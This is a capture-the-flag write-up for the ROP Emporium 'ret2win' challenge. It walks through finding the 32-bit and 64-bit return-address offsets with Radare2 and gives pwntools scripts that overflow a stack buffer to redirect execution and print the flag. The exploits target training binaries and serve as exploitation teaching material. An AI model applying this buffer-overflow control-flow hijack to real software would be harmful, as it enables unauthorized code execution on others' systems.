ROP Emporium - Ret2Win

Ret2Win 32 Bit

In this challenge, we need to redirect the program flow to execute the ret2win address. This can be achieved by overwriting EIP (Instruction Pointer) with the ret2win address. This challenge can be done using simple echo command or pwntools. I use Radare2 and pwntools to solves this challenge.

First thing first, lets find the EIP offset as shown on below snippets. The ragg2 -P 100 -r > fuzzing.txt command used to create pattern and save it into a file named fuzzing.txt. Then create R2 profile that will accept standard input from the fuzzing.txt file. The r2 -de dbg.profile=profile.rr2 ret2win32 command used to open the binary using R2 in debug mode and loading the R2 profile file. Inside the radare, use dc command to run the program and after crashing use wopO dr eip`` command to find the EIP offset.

root@Perseverance:~/rop_emporium/ret2win32# ragg2 -P 100 -r > fuzzing.txt 
root@Perseverance:~/rop_emporium/ret2win32# echo '#!/usr/bin/rarun2' > profile.rr2
root@Perseverance:~/rop_emporium/ret2win32# echo 'stdin=./fuzzing.txt' >> profile.rr2
root@Perseverance:~/rop_emporium/ret2win32# cat profile.rr2 
#!/usr/bin/rarun2
stdin=./fuzzing.txt

root@Perseverance:~/rop_emporium/ret2win32# r2 -de dbg.profile=profile.rr2 ret2win32 
Process with PID 3580 started...
= attach 3580 3580
bin.baddr 0x08048000
Using 0x8048000
asm.bits 32
glibc.fc_offset = 0x00148
[0xf7fcd0b0]> dc
ret2win by ROP Emporium
32bits

For my first trick, I will attempt to fit 50 bytes of user input into 32 bytes of stack buffer;
What could possibly go wrong?
You there madam, may I have your input please? And don't worry about null bytes, 
we're using fgets!

> child stopped with signal 11
[+] SIGNAL 11 errno=0 addr=0x41415041 code=1 ret=0
[0x41415041]> wopO `dr eip`
44

EIP offset is 44. Let’s find the ret2win address using Objdump command.

root@Perseverance:~/rop_emporium/ret2win32# objdump -d ret2win32 | grep ret2win
ret2win32:     file format elf32-i386
08048659 <ret2win>:

Ret2win address is 0x08048659. This make the final payload become "A" * 44 + <ret2win_address> to overwrite the EIP. Below is a simple python script using pwntools to automate the process.

#!/usr/bin/python
from pwn import *

def main():
    junk = "A" * 44			# EIP Offset at 44
    ret2win_addr = p32(0x08048659)	# Objdump -d ret2win32 | grep ret2win
    p = process("./ret2win32")
    payload = junk + ret2win_addr

    p.sendlineafter(">", payload)
    print p.recvall()

if __name__ == "__main__":
    main()

Run the script and grab the flag.

root@Perseverance:~/rop_emporium/ret2win32# ./ret2win32.py 
[+] Starting local process './ret2win32': pid 2478
[+] Receiving all data: Done (62B)
[*] Stopped process './ret2win32' (pid 2478)
 Thank you! Here's your flag:ROPE{a_placeholder_32byte_flag!}

Ret2Win 64 Bit

Same as on the 32 bit, let’s find the RIP offset using Radare2. For 64 bit, the command to find the offset is a little bit different. Use pxq command to check the value on RSP and then use wopO to check the offset of that value.

root@Perseverance:~/rop_emporium/ret2win# r2 -de dbg.profile=profile.rr2 ret2win
Process with PID 3998 started...
= attach 3998 3998
bin.baddr 0x00400000
Using 0x400000
asm.bits 64
[0x7f27526ab090]> dc
ret2win by ROP Emporium
64bits

For my first trick, I will attempt to fit 50 bytes of user input into 32 bytes of stack buffer;
What could possibly go wrong?
You there madam, may I have your input please? And don't worry about null bytes, 
we're using fgets!

> child stopped with signal 11
[+] SIGNAL 11 errno=0 addr=0x00000000 code=128 ret=0
[0x00400810]> pxq 8@rsp
0x7ffd411e3768  0x41415041414f4141                       AAOAAPAA
[0x00400810]> wopO 0x41415041414f4141
40

RIP offset is 40. Let’s find the ret2win address using Objdump command.

root@Perseverance:~/rop_emporium/ret2win# objdump -d ret2win | grep ret2win
ret2win:     file format elf64-x86-64
0000000000400811 <ret2win>:

Ret2win address is 0x0000000000400811, overwrite the RIP with ret2win address using this payload "A" * 40 + <ret2win_address>. Below is a simple python script using pwntools to automate the process.

#!/usr/bin/python
from pwn import *

def main():
    junk = "A" * 40				# RIP Offset at 40
    ret2win_addr = p64(0x0000000000400811)	# Objdump -d ret2win | grep ret2win
    p = process("./ret2win")
    payload = junk + ret2win_addr

    p.sendlineafter(">", payload)
    print p.recvall()

if __name__ == "__main__":
    main()

Run the script and grab the flag.

root@Perseverance:~/rop_emporium/ret2win# ./ret2win.py 
[+] Starting local process './ret2win': pid 2509
[+] Receiving all data: Done (62B)
[*] Stopped process './ret2win' (pid 2509)
 Thank you! Here's your flag:ROPE{a_placeholder_32byte_flag!}